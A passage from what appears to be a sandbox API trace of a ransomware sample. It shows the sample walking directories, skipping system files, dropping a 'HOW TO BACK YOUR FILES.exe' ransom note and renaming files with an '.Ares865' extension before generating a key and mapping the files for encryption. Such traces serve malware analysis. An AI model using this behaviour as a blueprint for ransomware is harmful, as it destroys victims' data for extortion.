ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2="aoldtz.exe") returned 1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2=".") returned 1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2="..") returned 1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2="windows") returned -1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2="bootmgr") returned 1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2="temp") returned 1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2="pagefile.sys") returned 1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2="boot") returned 1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2="ids.txt") returned 1 [0083.645] lstrcmpiW (lpString1="User Account Pictures", lpString2="ntuser.dat") returned 1 [0083.646] lstrcmpiW (lpString1="User Account Pictures", lpString2="perflogs") returned 1 [0083.646] lstrcmpiW (lpString1="User Account Pictures", lpString2="MSBuild") returned 1 [0083.646] lstrlenW (lpString="User Account Pictures") returned 21 [0083.646] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search") returned 35 [0083.646] lstrcpyW (in: lpString1=0x2cce43a, lpString2="User Account Pictures" | out: lpString1="User Account Pictures") returned="User Account Pictures" [0083.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0083.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x66) returned 0x2e4710 [0083.646] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0083.646] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="aoldtz.exe") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2=".") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="..") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="windows") returned -1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="bootmgr") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="temp") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="pagefile.sys") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="boot") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="ids.txt") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="ntuser.dat") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="perflogs") returned 1 [0083.646] lstrcmpiW (lpString1="Vault", lpString2="MSBuild") returned 1 [0083.646] lstrlenW (lpString="Vault") returned 5 [0083.646] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned 50 [0083.646] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Vault" | out: lpString1="Vault") returned="Vault" [0083.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0083.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x46) returned 0x2eeb50 [0083.646] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 [0083.646] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0083.646] lstrcmpiW (lpString1="VISIO", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.646] lstrcmpiW (lpString1="VISIO", lpString2="aoldtz.exe") returned 1 [0083.646] lstrcmpiW (lpString1="VISIO", lpString2=".") returned 1 [0083.646] lstrcmpiW (lpString1="VISIO", lpString2="..") returned 1 [0083.646] lstrcmpiW (lpString1="VISIO", lpString2="windows") returned -1 [0083.646] lstrcmpiW (lpString1="VISIO", lpString2="bootmgr") returned 1 [0083.647] lstrcmpiW (lpString1="VISIO", lpString2="temp") returned 1 [0083.647] lstrcmpiW (lpString1="VISIO", lpString2="pagefile.sys") returned 1 [0083.647] lstrcmpiW (lpString1="VISIO", lpString2="boot") returned 1 [0083.647] lstrcmpiW (lpString1="VISIO", lpString2="ids.txt") returned 1 [0083.647] lstrcmpiW (lpString1="VISIO", lpString2="ntuser.dat") returned 1 [0083.647] lstrcmpiW (lpString1="VISIO", lpString2="perflogs") returned 1 [0083.647] lstrcmpiW (lpString1="VISIO", lpString2="MSBuild") returned 1 [0083.647] lstrlenW (lpString="VISIO") returned 5 [0083.647] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Vault") returned 34 [0083.647] lstrcpyW (in: lpString1=0x2cce43a, lpString2="VISIO" | out: lpString1="VISIO") returned="VISIO" [0083.647] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0083.647] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x46) returned 0x2eeba0 [0083.647] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c90 | out: ListHead=0x2e7710, ListEntry=0x2e7c90) returned 0x2e7cd0 [0083.647] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60ae73a0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x60ae73a0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0083.647] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.647] lstrcmpiW (lpString1="Windows", lpString2="aoldtz.exe") returned 1 [0083.647] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0083.647] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0083.647] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0083.647] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="aoldtz.exe") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2=".") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="..") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="windows") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="bootmgr") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="temp") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="pagefile.sys") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="boot") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="ids.txt") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="ntuser.dat") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="perflogs") returned 1 [0083.647] lstrcmpiW (lpString1="Windows Defender", lpString2="MSBuild") returned 1 [0083.647] lstrlenW (lpString="Windows Defender") returned 16 [0083.647] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\VISIO") returned 34 [0083.647] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Windows Defender" | out: lpString1="Windows Defender") returned="Windows Defender" [0083.648] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0083.648] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5c) returned 0x2f1fc8 [0083.648] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c70 | out: ListHead=0x2e7710, ListEntry=0x2e7c70) returned 0x2e7c90 [0083.648] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="aoldtz.exe") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2=".") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="..") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="windows") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="bootmgr") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="temp") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="pagefile.sys") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="boot") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="ids.txt") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="ntuser.dat") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="perflogs") returned 1 [0083.648] lstrcmpiW (lpString1="Windows NT", lpString2="MSBuild") returned 1 [0083.648] lstrlenW (lpString="Windows NT") returned 10 [0083.648] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows Defender") returned 45 [0083.648] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Windows NT" | out: lpString1="Windows NT") returned="Windows NT" [0083.648] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0083.648] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2ed950 [0083.648] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0083.648] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0083.648] lstrcmpiW (lpString1="WwanSvc", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.648] lstrcmpiW (lpString1="WwanSvc", lpString2="aoldtz.exe") returned 1 [0083.648] lstrcmpiW (lpString1="WwanSvc", lpString2=".") returned 1 [0083.648] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc" [0083.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed9a8 | out: hHeap=0x2b0000) returned 1 [0083.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0083.649] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WwanSvc") returned 36 [0083.649] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc" [0083.649] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.649] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.649] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.649] GetLastError () returned 0x0 [0083.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.649] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.650] CloseHandle (hObject=0x120) returned 1 [0083.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.650] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.650] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.650] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.650] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.650] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" [0083.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2100 | out: hHeap=0x2b0000) returned 1 [0083.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0083.650] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned 45 [0083.650] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" [0083.650] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.650] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.651] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.651] GetLastError () returned 0x0 [0083.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.651] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.651] CloseHandle (hObject=0x120) returned 1 [0083.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.651] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.651] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.652] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.652] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.652] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT") returned="C:\\Users\\All Users\\Microsoft\\Windows NT" [0083.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed950 | out: hHeap=0x2b0000) returned 1 [0083.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0083.652] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT") returned 39 [0083.652] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT") returned="C:\\Users\\All Users\\Microsoft\\Windows NT" [0083.652] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.652] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.652] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.653] GetLastError () returned 0x0 [0083.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.653] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.653] CloseHandle (hObject=0x120) returned 1 [0083.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.653] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.653] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.653] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.653] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.653] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan" [0083.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2168 | out: hHeap=0x2b0000) returned 1 [0083.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0083.653] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned 46 [0083.653] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan" [0083.653] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.653] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.654] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.654] GetLastError () returned 0x0 [0083.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.654] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.654] CloseHandle (hObject=0x120) returned 1 [0083.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.654] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.654] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.654] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.655] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.655] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.Ares865") returned 70 [0083.655] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg.ares865"), dwFlags=0x1) returned 1 [0083.655] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.656] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=516424) returned 1 [0083.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.656] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.657] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.657] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.658] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e450, lpName=0x0) returned 0x15c [0083.659] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e450) returned 0x420000 [0083.683] 